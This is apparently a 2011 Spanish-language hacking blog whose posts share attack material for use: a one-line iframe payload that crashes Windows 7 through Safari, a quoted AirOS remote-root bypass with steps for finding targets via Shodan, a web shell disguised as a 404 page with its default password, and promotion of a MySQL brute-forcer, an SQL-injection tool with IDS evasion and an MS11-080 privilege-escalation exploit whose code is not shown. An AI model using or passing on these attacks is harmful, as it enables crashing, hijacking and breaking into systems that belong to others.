31 de dic. de 2011

BSOD (Blue Screen Of Death) En Win7 Via Safari

Para los que no se enteraron, salió a luz una simple vulneravilidad (Safari Iframe Vulnerability 20.12.2011) que provoca un BSOD (Pantallazo Azul (de la muerte)) al abrir un archivo *.html con un iframe que excede el tamaño soportado por Safari.

Datos del Exploit : 

# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil

La vulnerabilidad se explota simplemente poniendo en un archivo *.html el siguiente código:
<iframe height='18082563'></iframe>

26 de dic. de 2011

0day en AirOS (Acceso como Root)

Bueno, me ha llegado un mail bastante interesante sobre un 0day en Arios, y no sé de que tanto tiempo estemos hablando, pero revisando un poco me he dado cuenta que sigue muy vigente...

Y esto decia el mail:

AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

24 de dic. de 2011

Feliz Navidad les desea Blackploit!

Feliz navidad a todos les desea Blackploit!, con el compromiso de poder seguir aportando en el futuro...

[+] Salu2
[+] Zion3R


22 de dic. de 2011

[MySQL Password Auditor] Auditoría & Recuperación de Contraseñas MySQL


Desde SecurityXploded les traigo MysqlPasswordAuditor que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).

MysqlPasswordAuditor ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.

MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas aquí.

15 de dic. de 2011

[The Mole] Herramienta de Inyección SQL/SQLi Automatizada

Como regalo de navidad les traigo una de tantas herramientas para SQLi que existen, pero está me ha gustado bastante primero por que es de muy fácil uso y también por los métodos de petición que tiene.

The Mole es una herramienta de inyección SQL automatizada que mediante una URL vulnerable con su(s) respectivo(s) string(s) detectada y testeada en busca de vulnerabilidad SQLi, ya sea por método UNION o por consulta Booleana.

Características:
  • Soporta inyecciones a MySQL, SQL Server, PostgreSQL & Oracle.
  • Soporta linea de comandos. Diferente comando producen diferentes respuestas.
  • Auto-completación de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
  • Soporte pata filtros de consulta, para bypass IPS/IDS.
  • Explota inyecciones SQL a través de métodos GET y POST.
  • Desarrollada en python3.

13 de dic. de 2011

[Shell PHP] Error 404 Privada


Los chicos de www.subhashdasyam.com han hecho una Shell en PHP que la he encontrado bastante ingeniosa, útil y me ha gustado mucho. No necesita una ser detallada muy a fondo, ya que es como una Shell normal, solo que cuando uno intenta acceder aparece el clásico Error 404 - Not Found, pero tiene un  casilla secreta donde puedes poner una contraseña para acceder.

La contraseña por defecto es HACKED pero la pueden cambiar modificando la linea 4 en donde tienen que cambiar el hash MD5 que aparece por el hash MD5 de la contraseña que ustedes consideren.

1 de dic. de 2011

Escalación de Privilegios en Windows (MS11-080 Afd.sys)

Este exploit (MS11-080 privilege escalation) se aprovecha del hecho de que afd.sys no valida correctamente user-mode que pasa al kernel-mode.

Ando muy corto de tiempo como para  poner más detalles (es más, ni si quiera lo he probado :O), pero cualquier Privilege Escalation es importante hacerlo notar.

Espero conforme los días ir posteando más detalles y modo de uso.


Usage: MS11-080.py -O TARGET_OS

Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3

Les dejo el exploit (Python):